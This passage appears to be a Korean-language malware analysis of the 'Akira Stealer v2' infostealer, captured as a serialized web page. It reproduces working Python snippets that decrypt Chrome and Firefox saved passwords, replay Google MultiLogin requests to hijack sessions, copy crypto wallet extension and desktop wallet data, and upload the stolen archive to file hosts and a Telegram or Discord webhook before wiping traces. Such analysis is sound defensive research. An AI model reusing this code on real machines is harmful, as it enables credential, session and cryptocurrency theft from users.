CryptUnprotectData under the hood\n        return CryptUnprotectData(buffer)\n\n    # 2) AES-GCM decryption for Chrome v10/v11 format:\n    # Bytes layout:\n    # [0:3]    = version header ('v10'/'v11')\n    # [3:15]   = initialization vector (IV)\n    # [15:-16] = ciphertext payload\n    # [-16:]   = GCM authentication tag\n    iv = buffer[3:15]\n    ciphertext = buffer[15:-16]\n    tag = buffer[-16:]\n\n    # Initialize AES-GCM cipher with extracted IV and tag\n    cipher = Cipher(\n        algorithms.AES(key),\n        modes.GCM(iv, tag),\n        backend=default_backend()\n    )\n    decryptor = cipher.decryptor()\n\n    # Perform decryption; raises if authentication fails\n    plaintext = decryptor.update(ciphertext) + decryptor.finalize()\n\n    # Decode to UTF-8, ignoring any stray errors\n    return plaintext.decode('utf-8', errors='ignore')\n",[578,7206,7207,7212,7217,7221,7225,7230,7234,7239,7243,7248,7253,7258,7262,7267,7272,7276,7281,7286,7291,7296,7300,7305,7310,7315,7320,7325,7330,7335,7340,7345,7349,7354,7359,7364,7369,7374,7378,7383,7387,7392,7397,7401,7406],{"__ignoreMap":530},[1706,7208,7209],{"class":1708,"line":1709},[1706,7210,7211],{},"from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes\n",[1706,7213,7214],{"class":1708,"line":531},[1706,7215,7216],{},"from cryptography.hazmat.backends import default_backend\n",[1706,7218,7219],{"class":1708,"line":2091},[1706,7220,3871],{"emptyLinePlaceholder":325},[1706,7222,7223],{"class":1708,"line":2097},[1706,7224,3871],{"emptyLinePlaceholder":325},[1706,7226,7227],{"class":1708,"line":2419},[1706,7228,7229],{},"def decrypt_password_blob(buffer: bytes, key: bytes) -> str:\n",[1706,7231,7232],{"class":1708,"line":2425},[1706,7233,5858],{},[1706,7235,7236],{"class":1708,"line":3081},[1706,7237,7238],{},"    Decrypts a Chrome password blob using either DPAPI or AES-GCM.\n",[1706,7240,7241],{"class":1708,"line":3874},[1706,7242,3871],{"emptyLinePlaceholder":325},[1706,7244,7245],{"class":1708,"line":3880},[1706,7246,7247],{},"    Parameters:\n",[1706,7249,7250],{"class":1708,"line":4129},[1706,7251,7252],{},"    - buffer: raw encrypted blob from the `password_value` field\n",[1706,7254,7255],{"class":1708,"line":5054},[1706,7256,7257],{},"    - key: the master AES key retrieved via DPAPI from Local State\n",[1706,7259,7260],{"class":1708,"line":5060},[1706,7261,3871],{"emptyLinePlaceholder":325},[1706,7263,7264],{"class":1708,"line":5066},[1706,7265,7266],{},"    Returns:\n",[1706,7268,7269],{"class":1708,"line":5072},[1706,7270,7271],{},"    - Decrypted UTF-8 plaintext password\n",[1706,7273,7274],{"class":1708,"line":5078},[1706,7275,5858],{},[1706,7277,7278],{"class":1708,"line":5084},[1706,7279,7280],{},"    # 1) DPAPI fallback for non-AES-GCM blobs\n",[1706,7282,7283],{"class":1708,"line":5090},[1706,7284,7285],{},"    if not buffer.startswith((b'v10', b'v11')):\n",[1706,7287,7288],{"class":1708,"line":5096},[1706,7289,7290],{},"        # Uses Windows CryptUnprotectData under the hood\n",[1706,7292,7293],{"class":1708,"line":5102},[1706,7294,7295],{},"        return CryptUnprotectData(buffer)\n",[1706,7297,7298],{"class":1708,"line":5108},[1706,7299,3871],{"emptyLinePlaceholder":325},[1706,7301,7302],{"class":1708,"line":5114},[1706,7303,7304],{},"    # 2) AES-GCM decryption for Chrome v10/v11 format:\n",[1706,7306,7307],{"class":1708,"line":5120},[1706,7308,7309],{},"    # Bytes layout:\n",[1706,7311,7312],{"class":1708,"line":5126},[1706,7313,7314],{},"    # [0:3]    = version header ('v10'/'v11')\n",[1706,7316,7317],{"class":1708,"line":5132},[1706,7318,7319],{},"    # [3:15]   = initialization vector (IV)\n",[1706,7321,7322],{"class":1708,"line":5138},[1706,7323,7324],{},"    # [15:-16] = ciphertext payload\n",[1706,7326,7327],{"class":1708,"line":5804},[1706,7328,7329],{},"    # [-16:]   = GCM authentication tag\n",[1706,7331,7332],{"class":1708,"line":5809},[1706,7333,7334],{},"    iv = buffer[3:15]\n",[1706,7336,7337],{"class":1708,"line":5814},[1706,7338,7339],{},"    ciphertext = buffer[15:-16]\n",[1706,7341,7342],{"class":1708,"line":5819},[1706,7343,7344],{},"    tag = buffer[-16:]\n",[1706,7346,7347],{"class":1708,"line":5825},[1706,7348,3871],{"emptyLinePlaceholder":325},[1706,7350,7351],{"class":1708,"line":5830},[1706,7352,7353],{},"    # Initialize AES-GCM cipher with extracted IV and tag\n",[1706,7355,7356],{"class":1708,"line":5835},[1706,7357,7358],{},"    cipher = Cipher(\n",[1706,7360,7361],{"class":1708,"line":5840},[1706,7362,7363],{},"        algorithms.AES(key),\n",[1706,7365,7366],{"class":1708,"line":5845},[1706,7367,7368],{},"        modes.GCM(iv, tag),\n",[1706,7370,7371],{"class":1708,"line":5850},[1706,7372,7373],{},"        backend=default_backend()\n",[1706,7375,7376],{"class":1708,"line":5855},[1706,7377,5984],{},[1706,7379,7380],{"class":1708,"line":5861},[1706,7381,7382],{},"    decryptor = cipher.decryptor()\n",[1706,7384,7385],{"class":1708,"line":5867},[1706,7386,3871],{"emptyLinePlaceholder":325},[1706,7388,7389],{"class":1708,"line":5873},[1706,7390,7391],{},"    # Perform decryption; raises if authentication fails\n",[1706,7393,7394],{"class":1708,"line":5878},[1706,7395,7396],{},"    plaintext = decryptor.update(ciphertext) + decryptor.finalize()\n",[1706,7398,7399],{"class":1708,"line":5883},[1706,7400,3871],{"emptyLinePlaceholder":325},[1706,7402,7403],{"class":1708,"line":5888},[1706,7404,7405],{},"    # Decode to UTF-8, ignoring any stray errors\n",[1706,7407,7408],{"class":1708,"line":5893},[1706,7409,7410],{},"    return plaintext.decode('utf-8', errors='ignore')\n",[740,7412,7414],{"id":7413},"_76-세션-토큰-하이재킹","7.6 세션 토큰 하이재킹",[526,7416,746],{},[526,7418,7419,7420,7423],{},"Akira는 수동적 데이터 수집에서 멈추지 않습니다. 라이브 세션 토큰을 능동적으로 하이재킹하여 실시간으로 피해자를 사칭합니다. 브라우저 저장소에서 암호화된 토큰을 추출한 뒤, 필요한 인증 헤더를 재구성하고 Google의 OAuth 엔드포인트에 대해 ",[567,7421,7422],{},"MultiLogin"," 요청을 리플레이합니다. 아래 코드 스니펫이 이 과정을 보여 줍니다:",[615,7425,7427],{"className":4515,"code":7426,"language":4517,"meta":530,"style":530},"# Build SAPISIDHASH header for Google services\norigin = \"https://accounts.google.com\"\ntimestamp = int(time.time())\n# Compute SHA1 of \"timestamp origin SAPISID\"\npayload = f\"{timestamp} {origin} {sap_id_cookie}\".encode()\nsignature = hashlib.sha1(payload).hexdigest()\nheaders = {\n    \"Authorization\": f\"SAPISIDHASH {timestamp}_{signature}\",\n    \"Content-Type\": \"application/json\"\n}\n# Replay MultiLogin to fetch valid session cookies\nresponse = requests.post(\n    \"https://accounts.google.com/accounts/multilogin\",\n    headers=headers,\n    json={\"continue\": \"https://mail.google.com\"}\n)\nif response.status_code == 200:\n    # Victim’s cookies now present in response.cookies\n    hijacked_cookies = response.cookies\n",[578,7428,7429,7434,7439,7444,7449,7454,7459,7464,7469,7474,7478,7483,7488,7493,7498,7503,7507,7512,7517],{"__ignoreMap":530},[1706,7430,7431],{"class":1708,"line":1709},[1706,7432,7433],{},"# Build SAPISIDHASH header for Google services\n",[1706,7435,7436],{"class":1708,"line":531},[1706,7437,7438],{},"origin = \"https://accounts.google.com\"\n",[1706,7440,7441],{"class":1708,"line":2091},[1706,7442,7443],{},"timestamp = int(time.time())\n",[1706,7445,7446],{"class":1708,"line":2097},[1706,7447,7448],{},"# Compute SHA1 of \"timestamp origin SAPISID\"\n",[1706,7450,7451],{"class":1708,"line":2419},[1706,7452,7453],{},"payload = f\"{timestamp} {origin} {sap_id_cookie}\".encode()\n",[1706,7455,7456],{"class":1708,"line":2425},[1706,7457,7458],{},"signature = hashlib.sha1(payload).hexdigest()\n",[1706,7460,7461],{"class":1708,"line":3081},[1706,7462,7463],{},"headers = {\n",[1706,7465,7466],{"class":1708,"line":3874},[1706,7467,7468],{},"    \"Authorization\": f\"SAPISIDHASH {timestamp}_{signature}\",\n",[1706,7470,7471],{"class":1708,"line":3880},[1706,7472,7473],{},"    \"Content-Type\": \"application/json\"\n",[1706,7475,7476],{"class":1708,"line":4129},[1706,7477,2428],{},[1706,7479,7480],{"class":1708,"line":5054},[1706,7481,7482],{},"# Replay MultiLogin to fetch valid session cookies\n",[1706,7484,7485],{"class":1708,"line":5060},[1706,7486,7487],{},"response = requests.post(\n",[1706,7489,7490],{"class":1708,"line":5066},[1706,7491,7492],{},"    \"https://accounts.google.com/accounts/multilogin\",\n",[1706,7494,7495],{"class":1708,"line":5072},[1706,7496,7497],{},"    headers=headers,\n",[1706,7499,7500],{"class":1708,"line":5078},[1706,7501,7502],{},"    json={\"continue\": \"https://mail.google.com\"}\n",[1706,7504,7505],{"class":1708,"line":5084},[1706,7506,5272],{},[1706,7508,7509],{"class":1708,"line":5090},[1706,7510,7511],{},"if response.status_code == 200:\n",[1706,7513,7514],{"class":1708,"line":5096},[1706,7515,7516],{},"    # Victim’s cookies now present in response.cookies\n",[1706,7518,7519],{"class":1708,"line":5102},[1706,7520,7521],{},"    hijacked_cookies = response.cookies\n",[526,7523,7524],{},"이 요청을 리플레이함으로써, Akira는 유효한 세션으로 보호되는 사용자의 Gmail, Drive, 또는 기타 모든 Google 서비스를 자격 증명 없이 사칭할 수 있습니다. 이 기법은 Google 자체의 토큰 수용 로직을 활용하므로, 정상 클라이언트 동작과 거의 구별할 수 없게 만듭니다.",[740,7526,7528],{"id":7527},"_77-firefox-복호화","7.7 Firefox 복호화",[526,7530,746],{},[526,7532,7533,7534,7537],{},"Firefox 같은 Gecko 기반 브라우저는 ",[578,7535,7536],{},"key4.db","에 저장된 마스터 키를 사용해 저장된 자격 증명과 쿠키를 암호화합니다. Akira에는 Mozilla의 NSS 로직을 반영한 간소화된 복호화 루틴이 포함되어 있으며, 마스터 암호 프롬프트를 트리거하지 않고 3DES와 AES-CBC 변형을 모두 처리합니다. 사용 예시:",[615,7539,7541],{"className":4515,"code":7540,"language":4517,"meta":530,"style":530},"# Load global Salt and encrypted item from key4.db\ndb = sqlite3.connect(profile_path + \"/key4.db\")\ncursor = db.cursor()\ncursor.execute(\"SELECT item1, item2 FROM metadata WHERE id = 'password'\")\nglobal_salt, item2 = cursor.fetchone()\n\n# Decode DER structure and derive key\ndecoded, _ = der_decode(item2)\nentry_salt = decoded[0][1][0].asOctets()\ncipher_text = decoded[1].asOctets()\n# Derive 3DES key\nkey = derive_3des_key(global_salt, master_password, entry_salt)\niv = decoded[0][1][1].asOctets()\n# Decrypt credentials\ncipher = DES3.new(key, DES3.MODE_CBC, iv)\nclear_password = unpad(cipher.decrypt(cipher_text))\n\nprint(\"Decrypted Firefox password:\", clear_password)\n",[578,7542,7543,7548,7553,7558,7563,7568,7572,7577,7582,7587,7592,7597,7602,7607,7612,7617,7622,7626],{"__ignoreMap":530},[1706,7544,7545],{"class":1708,"line":1709},[1706,7546,7547],{},"# Load global Salt and encrypted item from key4.db\n",[1706,7549,7550],{"class":1708,"line":531},[1706,7551,7552],{},"db = sqlite3.connect(profile_path + \"/key4.db\")\n",[1706,7554,7555],{"class":1708,"line":2091},[1706,7556,7557],{},"cursor = db.cursor()\n",[1706,7559,7560],{"class":1708,"line":2097},[1706,7561,7562],{},"cursor.execute(\"SELECT item1, item2 FROM metadata WHERE id = 'password'\")\n",[1706,7564,7565],{"class":1708,"line":2419},[1706,7566,7567],{},"global_salt, item2 = cursor.fetchone()\n",[1706,7569,7570],{"class":1708,"line":2425},[1706,7571,3871],{"emptyLinePlaceholder":325},[1706,7573,7574],{"class":1708,"line":3081},[1706,7575,7576],{},"# Decode DER structure and derive key\n",[1706,7578,7579],{"class":1708,"line":3874},[1706,7580,7581],{},"decoded, _ = der_decode(item2)\n",[1706,7583,7584],{"class":1708,"line":3880},[1706,7585,7586],{},"entry_salt = decoded[0][1][0].asOctets()\n",[1706,7588,7589],{"class":1708,"line":4129},[1706,7590,7591],{},"cipher_text = decoded[1].asOctets()\n",[1706,7593,7594],{"class":1708,"line":5054},[1706,7595,7596],{},"# Derive 3DES key\n",[1706,7598,7599],{"class":1708,"line":5060},[1706,7600,7601],{},"key = derive_3des_key(global_salt, master_password, entry_salt)\n",[1706,7603,7604],{"class":1708,"line":5066},[1706,7605,7606],{},"iv = decoded[0][1][1].asOctets()\n",[1706,7608,7609],{"class":1708,"line":5072},[1706,7610,7611],{},"# Decrypt credentials\n",[1706,7613,7614],{"class":1708,"line":5078},[1706,7615,7616],{},"cipher = DES3.new(key, DES3.MODE_CBC, iv)\n",[1706,7618,7619],{"class":1708,"line":5084},[1706,7620,7621],{},"clear_password = unpad(cipher.decrypt(cipher_text))\n",[1706,7623,7624],{"class":1708,"line":5090},[1706,7625,3871],{"emptyLinePlaceholder":325},[1706,7627,7628],{"class":1708,"line":5096},[1706,7629,7630],{},"print(\"Decrypted Firefox password:\", clear_password)\n",[526,7632,7633,7634,646,7636,646,7638,7640],{},"이 루틴으로 Akira는 각 Firefox 프로필에 대해 ",[578,7635,7031],{},[578,7637,7034],{},[578,7639,7037],{},"를 투명하게 덤프하고, 복호화된 출력을 다음에 기록할 수 있습니다:",[615,7642,7645],{"className":7643,"code":7644,"language":620},[618],"Passwords/Firefox_\u003CProfileName> Passwords.txt\nCookies/Firefox_\u003CProfileName> Cookies.txt\nHistory/Firefox_\u003CProfileName> History.txt\n",[578,7646,7644],{"__ignoreMap":530},[526,7648,7649],{},"이 접근은 사용자 수준의 마스터 암호 검사를 우회하여, 스틸러가 저장된 모든 자격 증명에 제약 없이 접근할 수 있게 합니다.*",[526,7651,7652],{},[567,7653,7654],{},"4. 파일 구조 및 명명",[615,7656,7659],{"className":7657,"code":7658,"language":620,"meta":530},[618],"\u003CComputerName>.zip\n└── \u003CComputerName>\\\n    ├── Passwords\\\n    │   ├── Chrome Passwords.txt\n    │   ├── Edge Passwords.txt\n    │   └── …\n    ├── Cookies\\\n    │   ├── Chrome Cookies.txt\n    │   ├── Edge Cookies.txt\n    │   ├── user@example.com Google Session.txt\n    │   └── …\n    ├── CreditCards\\\n    │   ├── Chrome CreditCards.txt\n    │   └── …\n    ├── History\\\n    │   ├── Chrome History.txt\n    │   └── …\n    ├── Autofill\\\n    │   ├── Chrome Autofill.txt\n    │   └── …\n    └── Wallets\\\n        ├── Firefox_Default_profiles.zip\n        ├── Firefox_Profile1_profiles.zip\n        └── …\n",[578,7660,7658],{"__ignoreMap":530},[630,7662,7663,7677,7683],{},[633,7664,6514,7665,7668,7669,7672,7673,7676],{},[578,7666,7667],{},".txt","는 일관된 헤더(",[578,7670,7671],{},"\u003C================[Akira Stealer v2]>================>",")와 구분선(",[578,7674,7675],{},"====…====",")으로 시작합니다.",[633,7678,7679,7680,2147],{},"디스크상 ZIP: ",[578,7681,7682],{},"%TEMP%\\\u003CComputerName>.zip",[633,7684,7685,7686,2147],{},"C&C 파일명 레이블: ",[578,7687,7688],{},"Akira-\u003Cusername>.zip",[526,7690,7691],{},[567,7692,7693],{},"5. 유출 및 정리",[615,7695,7697],{"className":4515,"code":7696,"language":4517,"meta":530,"style":530},"url = Webhook.uploadToGofile(zip_path)\nif not url:\n    url = Webhook.uploadFileio(zip_path) or Webhook.uploadToOshiAt(zip_path)\nWebhook.sendDataTG(zip_path, chatId, startup)\nUtils.clear_client_folder()\n",[578,7698,7699,7704,7709,7714,7719],{"__ignoreMap":530},[1706,7700,7701],{"class":1708,"line":1709},[1706,7702,7703],{},"url = Webhook.uploadToGofile(zip_path)\n",[1706,7705,7706],{"class":1708,"line":531},[1706,7707,7708],{},"if not url:\n",[1706,7710,7711],{"class":1708,"line":2091},[1706,7712,7713],{},"    url = Webhook.uploadFileio(zip_path) or Webhook.uploadToOshiAt(zip_path)\n",[1706,7715,7716],{"class":1708,"line":2097},[1706,7717,7718],{},"Webhook.sendDataTG(zip_path, chatId, startup)\n",[1706,7720,7721],{"class":1708,"line":2419},[1706,7722,7723],{},"Utils.clear_client_folder()\n",[630,7725,7726,7736,7750,7767],{},[633,7727,7728,7731,7732,7735],{},[567,7729,7730],{},"기본 채널(GoFile.io):"," 멀웨어는 먼저 탈취한 모든 아티팩트를 담은 ZIP 아카이브를 GoFile.io에 업로드하려고 시도하며, JSON 응답에서 공격자에게 아카이브에 대한 직접 접근을 부여하는 ",[578,7733,7734],{},"downloadPage"," URL을 파싱합니다.",[633,7737,7738,7741,7742,7745,7746,7749],{},[567,7739,7740],{},"자동 대체:"," GoFile 엔드포인트가 실패하면(네트워크 타임아웃, 속도 제한 등), 코드는 원활하게 ",[578,7743,7744],{},"file.io","로 되돌아가고, 그것마저 빈 링크를 반환하면 마지막으로 ",[578,7747,7748],{},"oshi.at","로 넘어갑니다. 두 대안 모두 예외를 발생시키지 않고 호출되어, 세 서비스 중 하나는 항상 순차적으로 시도되도록 보장합니다.",[633,7751,7752,7755,7756,7759,7760,646,7763,7766],{},[567,7753,7754],{},"웹훅 보고:"," URL(또는 지속적 실패 시 빈 문자열)이 결정되면, ",[578,7757,7758],{},"Webhook.sendDataTG(...)","가 호출되어 다운로드 링크, 머신 식별자(",[578,7761,7762],{},"chatId",[578,7764,7765],{},"startup"," 플래그), 모든 범주 개수(암호, 쿠키, 자동 완성, 지갑)를 하나의 Discord 또는 Telegram 메시지로 묶습니다.",[633,7768,7769,7772,7773,7776],{},[567,7770,7771],{},"즉각적 정리:"," 보고 후, ",[578,7774,7775],{},"Utils.clear_client_folder()","가 전체 임시 작업 공간과 ZIP 파일 자체를 재귀적으로 삭제하여, 수집된 데이터나 아카이브의 흔적을 디스크에 남기지 않습니다.",[847,7778,7779,7784],{},[526,7780,7781],{},[567,7782,7783],{},"실패 복원력:",[630,7785,7786,7793],{},[633,7787,7788,7789,7792],{},"모든 업로드 루틴은 실패 시 예외를 던지는 대신 ",[578,7790,7791],{},"\"\"","를 반환하여, 코드 흐름이 계속되도록 보장합니다.",[633,7794,7795],{},"모든 서비스에 도달할 수 없더라도, 멀웨어는 로컬 아티팩트를 지우기 전에 여전히 웹훅 보고를 전송하며(링크가 누락된 채로라도), 프로세스가 예기치 않게 충돌하지 않는 한 포렌식 잔여물을 최소화합니다.",[853,7797],{"className":7798},[856,857],[526,7800,7801],{},[567,7802,7803],{},"6. 견고성 및 오류 처리",[630,7805,7806,7823,7829,7838],{},[633,7807,7808,3282,7811,7814,7815,7818,7819,7822],{},[567,7809,7810],{},"세분화된 예외 처리:",[578,7812,7813],{},"shutil.copy",", SQLite 쿼리, ZIP 작업 등 모든 파일 시스템 상호작용은 ",[578,7816,7817],{},"try/except"," 블록으로 감싸집니다. 오류가 발생하면(잠긴 DB, 권한 거부, 잘못된 레코드), 예외가 포착되어 ",[578,7820,7821],{},"Akira.logErrorTg()","를 통해 로깅되고 실행이 계속되어, 실패를 해당 특정 파일이나 모듈로 격리합니다.",[633,7824,7825,7828],{},[567,7826,7827],{},"브라우저별 스레드 격리:"," 지원되는 각 브라우저의 추출 루틴은 자체 스레드에서 실행됩니다. 이 멀티스레드 설계는 한 브라우저 추출의 충돌이나 교착(예: 손상된 프로필, 누락된 키)이 다른 브라우저의 분석을 중단하거나 지연시키지 않도록 보장합니다.",[633,7830,7831,7834,7835,7837],{},[567,7832,7833],{},"조용한 대체 및 기본값:"," 대체 파일 호스트 업로드, 원격 리소스 확인, 하위 프로세스 생성 같은 많은 보조 루틴은 표면적 경고 없이 중첩된 ",[578,7836,7817],{},"를 사용하여 은닉성을 극대화합니다. 기본값(빈 문자열, 불리언)은 흐름을 중단 없이 유지하고 명백한 오류 조건을 제거하도록 선택됩니다.",[633,7839,7840,7843,7844,7847,7848,7851],{},[567,7841,7842],{},"뮤텍스 및 시작 가드:"," 명명된 뮤텍스(",[578,7845,7846],{},"1qsMlseJplTlArIF14f",")가 다중 인스턴스를 방지하고, 레지스트리 검사와 ",[578,7849,7850],{},"Utils.CreateMutex()","가 동시 실행을 방지하여 실제 배포 중 추가적인 안정성을 제공합니다.",[740,7853,7855],{"id":7854},"_78-지갑-및-토큰-유출","7.8 지갑 및 토큰 유출",[526,7857,746],{},[526,7859,7860],{},"이 단계에서 Akira Stealer v2는 브라우저 확장, 데스크톱 지갑, 메시징 토큰, 라이브 키로깅에 걸쳐 암호화폐 자격 증명과 세션 토큰에 대한 가장 포괄적인 훑기를 수행합니다. 병렬 스레드로 실행되어 어떤 벡터도 놓치지 않도록 보장합니다. 아래는 코드로 뒷받침된 단계별 심층 분석입니다.",[888,7862,7864],{"id":7863},"_781-브라우저-확장-지갑","7.8.1 브라우저 확장 지갑",[526,7866,894],{},[526,7868,7869,7872],{},[567,7870,7871],{},"표적:"," MetaMask, Phantom, Trust Wallet, Coinbase Wallet, Solflare, Exodus, Binance Chain Wallet, Keplr, Nami, TronLink, Rabby, Talisman 등 인기 브라우저 전반의 80개 이상 확장.",[615,7874,7876],{"className":4515,"code":7875,"language":4517,"meta":530,"style":530},"# Hardcoded list of extension IDs and human-friendly names\nwalletsExtensions = [\n    [\"MetaMask\",        \"nkbihfbeogaeaoehlefnkodbefgpgknn\"],\n    [\"Phantom\",         \"bfnaelmomeimhlpmgjnjophhpkkoljpa\"],\n    [\"TrustWallet\",     \"egjidjbpglichdcondbcbdnbeeppgdph\"],\n    [\"CoinbaseWallet\",  \"hfhmhopkfngkjcalldmaepmpilmjjemb\"],\n    [\"Solflare\",        \"bhhhlbepdkbapadjdnnojkbgioiodbic\"],\n    [\"BinanceChain\",    \"fhbohimaelbohpjbbldcngcnapndodjp\"],\n    [\"Keplr\",           \"dmkamcknogkgcdfhhbddcghachkejeap\"],\n    [\"Nami\",            \"lpfcbjknijpeeillifnkikgncikgfhdo\"],\n    [\"Talisman\",        \"fijngjgcjhjmmpcmkeiomlglpeiijkld\"],\n    [\"TronLink\",        \"ibnejdfjmmkpcnlpebklmnkoeoihofec\"],\n    # ... plus dozens more mapped in code\n]\n# Extraction loop for each browser profile\nfor browser_name, (user_data, proc_name) in paths.items():\n    base = os.path.join(user_data, \"Default\", \"Local Extension Settings\")\n    for ext_name, ext_id in walletsExtensions:\n        src = os.path.join(base, ext_id)\n        if os.path.isdir(src):\n            dest = os.path.join(Utils.get_temp_folder(), \"Wallets\", f\"{ext_name}_{browser_name}\")\n            shutil.copytree(src, dest, dirs_exist_ok=True)\n            data.ext_wallets_count += 1\n",[578,7877,7878,7883,7888,7893,7898,7903,7908,7913,7918,7923,7928,7933,7938,7943,7948,7953,7958,7963,7968,7973,7978,7983,7988],{"__ignoreMap":530},[1706,7879,7880],{"class":1708,"line":1709},[1706,7881,7882],{},"# Hardcoded list of extension IDs and human-friendly names\n",[1706,7884,7885],{"class":1708,"line":531},[1706,7886,7887],{},"walletsExtensions = [\n",[1706,7889,7890],{"class":1708,"line":2091},[1706,7891,7892],{},"    [\"MetaMask\",        \"nkbihfbeogaeaoehlefnkodbefgpgknn\"],\n",[1706,7894,7895],{"class":1708,"line":2097},[1706,7896,7897],{},"    [\"Phantom\",         \"bfnaelmomeimhlpmgjnjophhpkkoljpa\"],\n",[1706,7899,7900],{"class":1708,"line":2419},[1706,7901,7902],{},"    [\"TrustWallet\",     \"egjidjbpglichdcondbcbdnbeeppgdph\"],\n",[1706,7904,7905],{"class":1708,"line":2425},[1706,7906,7907],{},"    [\"CoinbaseWallet\",  \"hfhmhopkfngkjcalldmaepmpilmjjemb\"],\n",[1706,7909,7910],{"class":1708,"line":3081},[1706,7911,7912],{},"    [\"Solflare\",        \"bhhhlbepdkbapadjdnnojkbgioiodbic\"],\n",[1706,7914,7915],{"class":1708,"line":3874},[1706,7916,7917],{},"    [\"BinanceChain\",    \"fhbohimaelbohpjbbldcngcnapndodjp\"],\n",[1706,7919,7920],{"class":1708,"line":3880},[1706,7921,7922],{},"    [\"Keplr\",           \"dmkamcknogkgcdfhhbddcghachkejeap\"],\n",[1706,7924,7925],{"class":1708,"line":4129},[1706,7926,7927],{},"    [\"Nami\",            \"lpfcbjknijpeeillifnkikgncikgfhdo\"],\n",[1706,7929,7930],{"class":1708,"line":5054},[1706,7931,7932],{},"    [\"Talisman\",        \"fijngjgcjhjmmpcmkeiomlglpeiijkld\"],\n",[1706,7934,7935],{"class":1708,"line":5060},[1706,7936,7937],{},"    [\"TronLink\",        \"ibnejdfjmmkpcnlpebklmnkoeoihofec\"],\n",[1706,7939,7940],{"class":1708,"line":5066},[1706,7941,7942],{},"    # ... plus dozens more mapped in code\n",[1706,7944,7945],{"class":1708,"line":5072},[1706,7946,7947],{},"]\n",[1706,7949,7950],{"class":1708,"line":5078},[1706,7951,7952],{},"# Extraction loop for each browser profile\n",[1706,7954,7955],{"class":1708,"line":5084},[1706,7956,7957],{},"for browser_name, (user_data, proc_name) in paths.items():\n",[1706,7959,7960],{"class":1708,"line":5090},[1706,7961,7962],{},"    base = os.path.join(user_data, \"Default\", \"Local Extension Settings\")\n",[1706,7964,7965],{"class":1708,"line":5096},[1706,7966,7967],{},"    for ext_name, ext_id in walletsExtensions:\n",[1706,7969,7970],{"class":1708,"line":5102},[1706,7971,7972],{},"        src = os.path.join(base, ext_id)\n",[1706,7974,7975],{"class":1708,"line":5108},[1706,7976,7977],{},"        if os.path.isdir(src):\n",[1706,7979,7980],{"class":1708,"line":5114},[1706,7981,7982],{},"            dest = os.path.join(Utils.get_temp_folder(), \"Wallets\", f\"{ext_name}_{browser_name}\")\n",[1706,7984,7985],{"class":1708,"line":5120},[1706,7986,7987],{},"            shutil.copytree(src, dest, dirs_exist_ok=True)\n",[1706,7989,7990],{"class":1708,"line":5126},[1706,7991,7992],{},"            data.ext_wallets_count += 1\n",[630,7994,7995,8001],{},[633,7996,7997,8000],{},[567,7998,7999],{},"복사되는 파일",": 암호화된 키, 시드 문구, 로그인 자격 증명을 담은 확장별 IndexedDB, LevelDB, JSON 및 구성 파일.",[633,8002,8003,1001,8006,646,8009,8012],{},[567,8004,8005],{},"결과 폴더",[578,8007,8008],{},"Wallets/MetaMask_Chrome/",[578,8010,8011],{},"Wallets/Phantom_Edge/"," 등.",[888,8014,8016],{"id":8015},"_782-데스크톱-지갑-애플리케이션","7.8.2 데스크톱 지갑 애플리케이션",[526,8018,894],{},[526,8020,8021,8023],{},[567,8022,7871],{}," Electrum, Exodus, Atomic Wallet, Guarda, Rabby, Coinomi, Zcash, Armory, Bytecoin, Jaxx, Coinomi 등 주요 데스크톱 클라이언트.",[615,8025,8027],{"className":4515,"code":8026,"language":4517,"meta":530,"style":530},"walletsDesktop = [\n    [\"Electrum\",     os.path.join(os.getenv('APPDATA'), \"Electrum\", \"wallets\")],\n    [\"Exodus\",       os.path.join(os.getenv('APPDATA'), \"Exodus\", \"exodus.wallet\")],\n    [\"AtomicWallet\", os.path.join(os.getenv('LOCALAPPDATA'), \"atomic\", \"Local Storage\", \"leveldb\")],\n    [\"Guarda\",       os.path.join(os.getenv('APPDATA'), \"Guarda\", \"Local Storage\", \"leveldb\")],\n    [\"Rabby\",        os.path.join(os.getenv('APPDATA'), \"rabby-desktop\")],\n    [\"Coinomi\",      os.path.join(os.getenv('APPDATA'), \"Coinomi\", \"wallets\")],\n]\nfor name, path in walletsDesktop:\n    if os.path.isdir(path):\n        Utils.TaskKill(name.lower())\n        dest = os.path.join(Utils.get_temp_folder(), \"Wallets\", name)\n        shutil.copytree(path, dest, dirs_exist_ok=True)\n        data.desktop_wallets_count += 1\n",[578,8028,8029,8034,8039,8044,8049,8054,8059,8064,8068,8073,8078,8083,8088,8093],{"__ignoreMap":530},[1706,8030,8031],{"class":1708,"line":1709},[1706,8032,8033],{},"walletsDesktop = [\n",[1706,8035,8036],{"class":1708,"line":531},[1706,8037,8038],{},"    [\"Electrum\",     os.path.join(os.getenv('APPDATA'), \"Electrum\", \"wallets\")],\n",[1706,8040,8041],{"class":1708,"line":2091},[1706,8042,8043],{},"    [\"Exodus\",       os.path.join(os.getenv('APPDATA'), \"Exodus\", \"exodus.wallet\")],\n",[1706,8045,8046],{"class":1708,"line":2097},[1706,8047,8048],{},"    [\"AtomicWallet\", os.path.join(os.getenv('LOCALAPPDATA'), \"atomic\", \"Local Storage\", \"leveldb\")],\n",[1706,8050,8051],{"class":1708,"line":2419},[1706,8052,8053],{},"    [\"Guarda\",       os.path.join(os.getenv('APPDATA'), \"Guarda\", \"Local Storage\", \"leveldb\")],\n",[1706,8055,8056],{"class":1708,"line":2425},[1706,8057,8058],{},"    [\"Rabby\",        os.path.join(os.getenv('APPDATA'), \"rabby-desktop\")],\n",[1706,8060,8061],{"class":1708,"line":3081},[1706,8062,8063],{},"    [\"Coinomi\",      os.path.join(os.getenv('APPDATA'), \"Coinomi\", \"wallets\")],\n",[1706,8065,8066],{"class":1708,"line":3874},[1706,8067,7947],{},[1706,8069,8070],{"class":1708,"line":3880},[1706,8071,8072],{},"for name, path in walletsDesktop:\n",[1706,8074,8075],{"class":1708,"line":4129},[1706,8076,8077],{},"    if os.path.isdir(path):\n",[1706,8079,8080],{"class":1708,"line":5054},[1706,8081,8082],{},"        Utils.TaskKill(name.lower())\n",[1706,8084,8085],{"class":1708,"line":5060},[1706,8086,8087],{},"        dest = os.path.join(Utils.get_temp_folder(), \"Wallets\", name)\n",[1706,8089,8090],{"class":1708,"line":5066},[1706,8091,8092],{},"        shutil.copytree(path, dest, dirs_exist_ok=True)\n",[1706,8094,8095],{"class":1708,"line":5072},[1706,8096,8097],{},"        data.desktop_wallets_count += 1\n",[630,8099,8100,8113],{},[633,8101,8102,8105,8106,646,8109,8112],{},[567,8103,8104],{},"탈취되는 데이터",": 키스토어 파일(",[578,8107,8108],{},"*.dat",[578,8110,8111],{},"*.json","), 개인 키 내보내기, 